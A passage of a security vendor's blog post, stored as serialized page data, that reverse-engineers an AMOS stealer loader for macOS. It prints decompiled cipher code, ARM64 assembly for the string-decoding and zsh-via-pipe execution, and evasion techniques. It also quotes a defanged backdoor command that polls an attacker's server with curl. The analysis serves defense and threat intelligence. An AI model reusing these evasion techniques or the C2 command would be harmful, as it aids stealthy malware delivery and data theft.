Alphabet",[12,1249,192],{},[12,1251,1252],{},"The 68,604 output bytes from Layer 2 use only 16 unique byte values, drawn from two non-contiguous ASCII ranges:",[1254,1255,1256,1305],"ul",{},[1257,1258,1259,1262,1263,805,1266,805,1269,805,1272,805,1275,805,1278,805,1281,805,1284,805,1286,805,1289,805,1292,805,1295,805,1298,805,1300,805,1302],"li",{},[63,1260,1261],{},"0x20-0x2F",": space, ",[63,1264,1265],{},"!",[63,1267,1268],{},"\"",[63,1270,1271],{},"#",[63,1273,1274],{},"$",[63,1276,1277],{},"%",[63,1279,1280],{},"&",[63,1282,1283],{},"'",[63,1285,545],{},[63,1287,1288],{},")",[63,1290,1291],{},"*",[63,1293,1294],{},"+",[63,1296,1297],{},",",[63,1299,873],{},[63,1301,1013],{},[63,1303,1304],{},"/",[1257,1306,1307,1061,1310,805,1313,805,1316,805,1319,805,1322,805,1325,805,1328,1331],{},[63,1308,1309],{},"0x78-0x7F",[63,1311,1312],{},"x",[63,1314,1315],{},"y",[63,1317,1318],{},"z",[63,1320,1321],{},"{",[63,1323,1324],{},"|",[63,1326,1327],{},"}",[63,1329,1330],{},"~",", DEL",[12,1333,1334],{},"This is a deliberate choice. In a hex editor, these bytes look like whitespace, punctuation, and end-of-ASCII-range characters — they blend into what looks like metadata or padding, not encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also undercount the effective entropy because the byte distribution appears non-random.",[12,1336,1337,1338,1341,1342,1345,1346,1349,1350,1353],{},"Each byte from this alphabet encodes one nibble of the actual payload. The alphabet-to-nibble mapping is applied by the encode/decode function ",[63,1339,1340],{},"FUN_100000d60",", which we confirmed at ",[63,1343,1344],{},"0x100000d60",". It chains two sub-functions: ",[63,1347,1348],{},"FUN_100000b50"," builds an indexed map of the input string's characters, and ",[63,1351,1352],{},"FUN_100000c34"," walks this map, consuming 6 bits per step and accumulating output bytes 8 bits at a time:",[52,1355,1356],{"style":54},[524,1357,1358,1361,1362,1364,1365,1367,1368,1370,1371,1374,1375,420,1378,1380,1381,1383,1384,424,1387,1389,1390,1393,1394,1396,1397,424,1400,1402,1403,1406,1407,1410,1411,1413,1414,1417,1418,1420,1421,578,1424,1426,1427,1429,1430,1432],{},[102,1359,1360],{"style":528},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[102,1363,808],{"style":564},";\n",[102,1366,828],{"style":538}," {\n  local_52 = *(",[102,1369,1052],{"style":538}," *)puVar4;\n  lVar3 = ",[102,1372,1373],{"style":543},"FUN_1000a078c","(param_3, &local_52);  ",[102,1376,1377],{"style":528},"// look up nibble value",[102,1379,835],{"style":538}," (lVar3 == ",[102,1382,808],{"style":564},") {\n    ",[102,1385,1386],{"style":528},"// character not in alphabet, treat as raw",[102,1388,1373],{"style":543},"(param_3, &local_51);\n  } ",[102,1391,1392],{"style":538},"else"," {\n    iVar5 = iVar5 + ",[102,1395,585],{"style":564},";           ",[102,1398,1399],{"style":528},"// accumulate 4 bits",[102,1401,912],{"style":538}," (",[102,1404,1405],{"style":564},"7"," \u003C iVar5) {\n      std::string::",[102,1408,1409],{"style":543},"push_back","((",[102,1412,843],{"style":538},")param_1);  ",[102,1415,1416],{"style":528},"// emit byte when 8+ bits ready","\n      iVar5 = iVar5 + -",[102,1419,824],{"style":564},";\n    }\n  }\n  puVar4 = (",[102,1422,1423],{"style":538},"undefined8",[102,1425,756],{"style":538},")puVar4 + ",[102,1428,839],{"style":564},");\n} ",[102,1431,912],{"style":538}," (puVar4 != puVar1);\n",[12,1434,1435],{},"The 34,302 bytes that emerge from this pass are 99.7% printable ASCII, the payload at this stage looks like a large shell script or configuration blob to a superficial inspection.",[22,1437],{},[186,1439,1441],{"id":1440},"layer-4-compile-time-string-obfuscation","Layer 4, Compile-Time String Obfuscation",[12,1443,192],{},[12,1445,1446],{},"Short strings used internally are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory, they are consumed by the next operation and then the buffer is freed. At no point is a decoded string visible in the binary's static data sections.",[12,1448,1449,1450,1453],{},"The string hash function ",[63,1451,1452],{},"FUN_100000730"," provides a secondary obfuscation layer for string comparisons. Rather than comparing strings directly, which would leave plaintext in memory for pattern-matching, the binary computes and compares integer hashes:",[52,1455,1456],{"style":54},[524,1457,1458,1461,1464,540,1466,545,1468,757,1470,1472,1473,1476,1477,420,1480,420,1483,1486,1487,1489,1490,1492,1493,1495,1496,1114,1499,1502,1503,1505,1506,1508],{},[102,1459,1460],{"style":528},"// FUN_100000730 @ 0x100000730",[102,1462,1463],{"style":528},"// FNV-style string hash, avoids plaintext string comparisons",[102,1465,551],{"style":538},[102,1467,1452],{"style":543},[102,1469,843],{"style":538},[102,1471,551],{"style":538}," iVar4 = ",[102,1474,1475],{"style":564},"0x19a8",";    ",[102,1478,1479],{"style":528},"// FNV offset basis (modified)",[102,1481,1482],{"style":528},"// ...",[102,1484,1485],{"style":538},"for"," (; uVar3 != ",[102,1488,808],{"style":564},"; uVar3 = uVar3 - ",[102,1491,839],{"style":564},") {\n    iVar4 = (",[102,1494,551],{"style":538},")*pcVar1 + iVar4 * -",[102,1497,1498],{"style":564},"0x7fb91be3",[102,1500,1501],{"style":528},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[102,1504,839],{"style":564},";\n  }\n  ",[102,1507,593],{"style":538}," iVar4;\n}\n",[12,1510,1511],{},"The ARM64 implementation replaces the multiply with a fused multiply-add:",[52,1513,1514],{"style":54},[56,1515,1518],{"className":1516,"code":1517,"language":61},[59],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[63,1519,1517],{"__ignoreMap":65},[12,1521,1522],{},"This means that even comparing two strings inside the binary never produces a branch that a debugger can intercept cleanly at the string level — only at the hash level.",[22,1524],{},[186,1526,1528],{"id":1527},"layer-5-dual-instance-custom-stream-cipher","Layer 5 — Dual-Instance Custom Stream Cipher",[12,1530,192],{},[12,1532,1533,1534,1537],{},"This is where the obfuscation architecture becomes genuinely unusual. There are not one but ",[251,1535,1536],{},"two separate cipher instances"," running in the binary, each with a different hardcoded lookup table and a different starting counter. Both use the same algorithm structure, but they produce different output alphabets for different parts of the payload pipeline.",[12,1539,1540,1543,1544,718,1547,1550],{},[251,1541,1542],{},"Instance A"," — ",[63,1545,1546],{},"FUN_10007ab34",[63,1548,1549],{},"0x10007ab34",":",[52,1552,1553],{"style":54},[524,1554,1555,1558,1559,1364,1562,1564,1565,578,1567,1569,1570,1572,1573,578,1575,1577,1578,1580,1581,578,1583,1585,1586,1588,1589,1592,1593,1595,1596,1598],{},[102,1556,1557],{"style":528},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[102,1560,1561],{"style":564},"0x4c",[102,1563,828],{"style":538}," {\n  bVar2 = *(",[102,1566,1214],{"style":538},[102,1568,756],{"style":538},")local_e0 +\n          ((",[102,1571,581],{"style":538},")(*(",[102,1574,1214],{"style":538},[102,1576,756],{"style":538},")local_c8 + uVar5) ^ uVar6) & ",[102,1579,1223],{"style":564},"));\n  *(",[102,1582,1214],{"style":538},[102,1584,756],{"style":538},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[102,1587,551],{"style":538},")uVar5 + (uVar6 ^ bVar2);  ",[102,1590,1591],{"style":528},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[102,1594,839],{"style":564},";\n} ",[102,1597,912],{"style":538}," (uVar7 != uVar5);\n",[12,1600,1601,805,1604,718,1607,1550],{},[251,1602,1603],{},"Instance B",[63,1605,1606],{},"FUN_10007a7e0",[63,1608,1609],{},"0x10007a7e0",[52,1611,1612],{"style":54},[524,1613,1614,1558,1617,1364,1620,1564,1622,578,1624,1626,1627,1572,1629,578,1631,1633,1634,1580,1636,578,1638,1585,1640,1588,1642,1592,1645,1595,1647,1598],{},[102,1615,1616],{"style":528},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[102,1618,1619],{"style":564},"0x9f",[102,1621,828],{"style":538},[102,1623,1214],{"style":538},[102,1625,756],{"style":538},")local_c0 +\n          ((",[102,1628,581],{"style":538},[102,1630,1214],{"style":538},[102,1632,756],{"style":538},")local_a8 + uVar5) ^ uVar6) & ",[102,1635,1223],{"style":564},[102,1637,1214],{"style":538},[102,1639,756],{"style":538},[102,1641,551],{"style":538},[102,1643,1644],{"style":528},"// identical counter update formula",[102,1646,839],{"style":564},[102,1648,912],{"style":538},[12,1650,1651,1652,1654,1655,1657],{},"The algorithm is structurally identical but the starting counter differs (",[63,1653,1561],{}," vs ",[63,1656,1619],{},") and the lookup tables are at different memory addresses. Instance A is called from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is called from state 6 to produce the alphabet for the large shell script payload decode.",[12,1659,1660,1661,1664,1665,1668,1669,1672],{},"To be precise about what this cipher is: it is a ",[251,1662,1663],{},"substitution cipher with a counter-dependent index",". Each output byte is a table lookup where the index is ",[63,1666,1667],{},"(input_byte XOR counter) & 0xFF",". The counter updates as ",[63,1670,1671],{},"counter = (i + (counter XOR output)) & 0xFF"," after each byte, meaning each output byte feeds back into determining the next lookup index. This creates a dependency chain across the entire output sequence: you cannot decrypt byte N without having correctly decrypted bytes 0 through N−1. This property makes partial decryption or fault analysis significantly harder.",[12,1674,1675],{},"Neither instance is standard RC4. There is no S-Box initialisation phase and no S-Box swap operation. The lookup tables are static, pre-computed constants baked into the binary at compile time.",[22,1677],{},[186,1679,1681],{"id":1680},"layer-6-runtime-xor-with-exit-code-dependent-key","Layer 6 — Runtime XOR with Exit-Code Dependent Key",[12,1683,192],{},[12,1685,1686,1687,1690],{},"The final and most analytically defeating layer applies an in-place XOR transformation to the Stage 2 payload. The XOR key is not hardcoded. It is computed at runtime from the exit code of the ",[251,1688,1689],{},"first shell payload execution",", meaning it cannot be determined by any form of static analysis. The binary must actually execute, the first shell script must run to completion, and only then does the key exist.",[12,1692,1693],{},"The key derivation sequence in the ARM64 state machine dispatcher:",[52,1695,1696],{"style":54},[56,1697,1700],{"className":1698,"code":1699,"language":61},[59],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[63,1701,1699],{"__ignoreMap":65},[12,1703,1704],{},"The XOR loop that processes the Stage 2 payload:",[52,1706,1707],{"style":54},[56,1708,1711],{"className":1709,"code":1710,"language":61},[59],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[63,1712,1710],{"__ignoreMap":65},[12,1714,1715,1716,1719,1720,1723,1724,1726],{},"The key is a 16-bit value derived from the exit status byte of the first shell payload, multiplied by ",[63,1717,1718],{},"0x7f0"," and added to the current value of the state machine's base counter register ",[63,1721,1722],{},"w26",". The multiplication constant ",[63,1725,1718],{}," means that even a single-bit difference in the exit code produces a completely different key, there is no exploitable continuity between adjacent key values.",[12,1728,1729],{},"Without executing the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload is permanently opaque to static analysis. This is the single hardest barrier we encountered in this entire analysis.",[22,1731],{},[41,1733,1735],{"id":1734},"shell-execution-pipes-not-arguments-and-simd-xor","Shell Execution: Pipes, Not Arguments, and SIMD XOR",[12,1737,47],{},[12,1739,1740,1741,718,1744,1747],{},"The shell execution function ",[63,1742,1743],{},"FUN_10000091c",[63,1745,1746],{},"0x10000091c"," is architecturally the most interesting piece of the binary. It is where everything comes together, the decoded payload, the obfuscated command name, and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.",[186,1749,1751],{"id":1750},"step-1-the-command-name-is-never-in-plaintext","Step 1: The command name is never in plaintext",[12,1753,192],{},[12,1755,1756,1757,1760,1761,1764,1765,1768,1769,1772],{},"The string ",[63,1758,1759],{},"/bin/zsh"," does not exist anywhere in the binary. It is stored in the ",[63,1762,1763],{},"__cstring"," section at ",[63,1766,1767],{},"0x1007bb5c8"," as the obfuscated bytes ",[63,1770,1771],{},"\\x01LG@\\x01T]F",". The decoding happens at runtime using a single XOR operation, confirmed directly in the ARM64 assembly:",[52,1774,1775],{"style":54},[56,1776,1779],{"className":1777,"code":1778,"language":61},[59],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[63,1780,1778],{"__ignoreMap":65},[12,1782,1783,1784,1787,1788,1790,1791,1794],{},"The XOR key is ",[63,1785,1786],{},"0x2e",", the ASCII value of ",[63,1789,1013],{}," (period). The decode is performed in a single ",[63,1792,1793],{},"eor v0.8B, v0.8B, v1.8B",", an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decode loops will not flag.",[12,1796,1797,1798,805,1801,805,1804,805,1807,1810,1811,1814],{},"The verification is trivial: ",[63,1799,1800],{},"0x01 XOR 0x2e = 0x2f = /",[63,1802,1803],{},"0x4c XOR 0x2e = 0x62 = b",[63,1805,1806],{},"0x47 XOR 0x2e = 0x69 = i",[63,1808,1809],{},"0x40 XOR 0x2e = 0x6e = n"," — producing ",[63,1812,1813],{},"/bin"," in the first four bytes.",[186,1816,1818],{"id":1817},"step-2-the-pipe-architecture","Step 2: The pipe architecture",[12,1820,192],{},[12,1822,1823],{},"After decoding the command name, the function creates an OS pipe and forks:",[52,1825,1826],{"style":54},[56,1827,1830],{"className":1828,"code":1829,"language":61},[59],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[63,1831,1829],{"__ignoreMap":65},[12,1833,1834],{},"In the child process:",[52,1836,1837],{"style":54},[56,1838,1841],{"className":1839,"code":1840,"language":61},[59],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[63,1842,1840],{"__ignoreMap":65},[12,1844,1845,1846,1849,1850,1853,1854,1856],{},"The child replaces its standard input with the read end of the pipe, then executes ",[63,1847,1848],{},"/bin/zsh -s",". The shell in ",[63,1851,1852],{},"-s"," mode reads commands from stdin. From a process monitoring perspective, this process appears as ",[63,1855,1848],{}," with no arguments — which is indistinguishable from a legitimate interactive shell session.",[186,1858,1860],{"id":1859},"step-3-variable-size-chunk-writes","Step 3: Variable-size chunk writes",[12,1862,192],{},[12,1864,1865],{},"The parent process writes the decrypted payload to the pipe write end in deliberately variable-sized chunks:",[52,1867,1868],{"style":54},[56,1869,1872],{"className":1870,"code":1871,"language":61},[59],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[63,1873,1871],{"__ignoreMap":65},[12,1875,1876,1877,1880,1881,1884,1885,1888,1889,1892],{},"The chunk size formula ",[63,1878,1879],{},"(remaining_length % 192) + 64"," produces values between 64 and 255 bytes per write call, varying with the remaining payload length. This variable-chunk approach means that the write pattern, visible in kernel event tracing tools like ",[63,1882,1883],{},"ktrace"," or ",[63,1886,1887],{},"dtrace",", does not produce a recognisable fixed-size signature. Each execution of the same payload produces a different sequence of ",[63,1890,1891],{},"write()"," syscall sizes.",[12,1894,1895,1896,1898],{},"The 1-microsecond ",[63,1897,600],{}," between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU utilisation flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.",[186,1900,1902],{"id":1901},"step-4-immediate-memory-wipe","Step 4: Immediate memory wipe",[12,1904,192],{},[52,1906,1907],{"style":54},[56,1908,1911],{"className":1909,"code":1910,"language":61},[59],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[63,1912,1910],{"__ignoreMap":65},[12,1914,399,1915,1918],{},[63,1916,1917],{},"_bzero()"," call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no point in time, not even a microsecond, where the decrypted payload exists in memory after execution is complete. A live memory dump taken the instant after this function returns will find only zeroes where the payload was.",[12,1920,1921,1922,1925],{},"This is called ",[251,1923,1924],{},"zero-after-use"," and is the same technique used in high-assurance cryptographic libraries to prevent secret key material from persisting in memory. Seeing it in commodity malware is unusual and indicates a developer with a security engineering background.",[186,1927,1929],{"id":1928},"the-complete-execution-sequence","The complete execution sequence:",[12,1931,192],{},[52,1933,1934],{"style":54},[56,1935,1938],{"className":1936,"code":1937,"language":61},[59],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[63,1939,1937],{"__ignoreMap":65},[41,1941,1943],{"id":1942},"the-import-table-as-a-weapon","The Import Table as a Weapon",[12,1945,47],{},[12,1947,1948],{},"The complete import table of this binary is:",[52,1950,1951],{"style":54},[56,1952,1955],{"className":1953,"code":1954,"language":61},[59],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    __next_prime\n\n// STL containers\nappend    reserve    push_back    operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[63,1956,1954],{"__ignoreMap":65},[12,1958,1959],{},"The total import count is 27 symbols. What is missing is as significant as what is present.",[186,1961,1963],{"id":1962},"absent-networking","Absent — networking:",[12,1965,192],{},[52,1967,1968],{"style":54},[56,1969,1972],{"className":1970,"code":1971,"language":61},[59],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[63,1973,1971],{"__ignoreMap":65},[186,1975,1977],{"id":1976},"absent-file-system","Absent — file system:",[12,1979,192],{},[52,1981,1982],{"style":54},[56,1983,1986],{"className":1984,"code":1985,"language":61},[59],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[63,1987,1985],{"__ignoreMap":65},[186,1989,1991],{"id":1990},"absent-process-introspection","Absent — process introspection:",[12,1993,192],{},[52,1995,1996],{"style":54},[56,1997,2000],{"className":1998,"code":1999,"language":61},[59],"getpid      getuid      getenv      sysctl\n",[63,2001,1999],{"__ignoreMap":65},[186,2003,2005],{"id":2004},"absent-cryptography","Absent: Cryptography",[12,2007,47],{},[52,2009,2010],{"style":54},[56,2011,2014],{"className":2012,"code":2013,"language":61},[59],"CCCrypt     SecItemAdd  SecKeychainFind\n",[63,2015,2013],{"__ignoreMap":65},[12,2017,2018,2019,805,2022,2025,2026,805,2029,2032,2033,2036],{},"In a traditional malware sample, you expect to see imports for networking (",[63,2020,2021],{},"socket",[63,2023,2024],{},"connect",") or file manipulation (",[63,2027,2028],{},"fopen",[63,2030,2031],{},"write","). This binary has ",[251,2034,2035],{},"none",". To a standard scanner, this binary looks like a harmless process launcher. This is a deliberate architectural choice to bypass static analysis tools that flag suspicious API usage.",[12,2038,399,2039,2041],{},[63,2040,402],{}," binary does not perform the theft itself. Its sole purpose is to drop and execute the real malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for \"malicious binaries\" will see a loader with no network or file I/O capabilities and potentially grant it a \"clean\" verdict. It misses the fact that the binary is a specialized delivery system for a high-level script payload.",[22,2043],{},[25,2045,2047],{"id":2046},"the-backdoor","The Backdoor",[12,2049,31],{},[12,2051,2052,2053,2056],{},"The incident did not end after the initial compromise. Microsoft Defender telemetry showed a process running from ",[63,2054,2055],{},"/Users/\u003Credacted>/.mainhelper",", polling an external server:",[52,2058,2059],{"style":54},[56,2060,2062],{"className":262,"code":2061,"language":264,"meta":65,"style":65},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[63,2063,2064],{"__ignoreMap":65},[102,2065,2066,2069,2071],{"class":104,"line":105},[102,2067,2068],{"class":271},"sh",[102,2070,276],{"class":275},[102,2072,2073],{"class":289}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[12,2075,2076],{},"The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.",[12,2078,399,2079,2082,2083,2086,2087,2089],{},[63,2080,2081],{},".mainhelper"," binary (SHA-256: ",[63,2084,2085],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") had been installed by the osascript dropper via ",[63,2088,272],{}," on the day of the incident.",[22,2091],{},[25,2093,2095],{"id":2094},"the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","The Power of the Collective Shield: Our Exclusive Shared Threat Intelligence Platform",[12,2097,31],{},[12,2099,2100],{},"When an alert fires in our SOC, the clock doesn't just start for the affected customer, it starts for every organization under the glueckkanja shield. This investigation into a previously undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window where traditional vendors are blind because they haven't seen the threat yet.",[12,2102,2103],{},"This is where our proprietary Shared Threat Intelligence Platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive worth. We don't wait for industry updates; we create them. While our analysts were still dismantling the final layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd immunity effect, where a discovery at a single endpoint becomes a blocked threat for every organization we protect within minutes.",[12,2105,2106],{},"Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defenses. The answer lies in combining human expertise with an architecture that can deploy that knowledge instantly and at scale. When these insights are channeled through our shared intelligence model, the attacker's time advantage can be transformed into a liability, protecting our customers even before a threat is recognized by the wider industry.",[22,2108],{},[2110,2111,2112,2117,2120,2123],"blockquote",{},[12,2113,2114],{},[251,2115,2116],{},"Note on Data Privacy",[12,2118,2119],{},"Identifying information has been anonymised in this publication. Specific technical details, indicators, and timestamps may have been slightly altered to ensure the continued protection of the affected environment while maintaining the full technical integrity of the analysis.",[12,2121,2122],{},"The technical analysis and indicators of compromise (IOCs) provided in this report are for illustrative and educational purposes only. This information is provided on a \"best effort\" basis. glueckkanja AG makes no warranties, express or implied, regarding the completeness or accuracy of the data and shall not be held liable for any damages, losses, or security incidents resulting from the use or implementation of the information, rules, or signatures shared herein. Users are strongly advised to validate all indicators and rules in a controlled environment before deployment.",[12,2124,2125],{},"Indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.",[2127,2128,2129],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":65,"searchDepth":111,"depth":111,"links":2131},[2132,2133,2134,2135,2142,2143,2144,2145,2153,2160],{"id":43,"depth":111,"text":44},{"id":85,"depth":111,"text":86},{"id":146,"depth":111,"text":147},{"id":178,"depth":111,"text":179,"children":2136},[2137,2138,2139,2140,2141],{"id":188,"depth":329,"text":189},{"id":203,"depth":329,"text":204},{"id":217,"depth":329,"text":218},{"id":226,"depth":329,"text":227},{"id":243,"depth":329,"text":244},{"id":409,"depth":111,"text":410},{"id":499,"depth":111,"text":500},{"id":615,"depth":111,"text":616},{"id":686,"depth":111,"text":687,"children":2146},[2147,2148,2149,2150,2151,2152],{"id":701,"depth":329,"text":702},{"id":992,"depth":329,"text":993},{"id":1246,"depth":329,"text":1247},{"id":1440,"depth":329,"text":1441},{"id":1527,"depth":329,"text":1528},{"id":1680,"depth":329,"text":1681},{"id":1734,"depth":111,"text":1735,"children":2154},[2155,2156,2157,2158,2159],{"id":1750,"depth":329,"text":1751},{"id":1817,"depth":329,"text":1818},{"id":1859,"depth":329,"text":1860},{"id":1901,"depth":329,"text":1902},{"id":1928,"depth":329,"text":1929},{"id":1942,"depth":111,"text":1943,"children":2161},[2162,2163,2164,2165],{"id":1962,"depth":329,"text":1963},{"id":1976,"depth":329,"text":1977},{"id":1990,"depth":329,"text":1991},{"id":2004,"depth":329,"text":2005},null,"md",false,"post",{"lang":2171,"seoTitle":2172,"titleClass":2173,"date":2174,"categories":2175,"blogtitlepic":2177,"socialimg":2178,"customExcerpt":2179,"keywords":2180,"maxContent":2181,"asideNav":2182,"footer":2198,"contactInContent":2199,"published":2181,"hreflang":2256},"en","AMOS Stealer Variant: Reverse Engineering an Unknown macOS Malware — Incident to Intelligence","h2-font-size","2026-04-10",[2176],"Security","head-amos-stealer.png","/blog/heads/head-amos-stealer.png","A previously undocumented AMOS stealer variant compromised a macOS endpoint. No known hashes, no C2 data in any public database. Our SOC dismantled six layers of obfuscation, extracted every indicator, and pushed protection to all SOC customers within hours, before the wider industry had even seen the sample.","AMOS stealer, macOS malware, reverse engineering, malware analysis, Ghidra, ARM64, incident response, threat intelligence, CSOC, macOS security, stealer malware, shared threat intelligence, atomic macOS stealer",true,{"menuItems":2183},[2184,2187,2190,2193,2195],{"href":2185,"text":2186},"#the-incident-a-unknown-ioc-scenario","The Incident",{"href":2188,"text":2189},"#stage-1-sandbox-checks","Stage 1: Sandbox 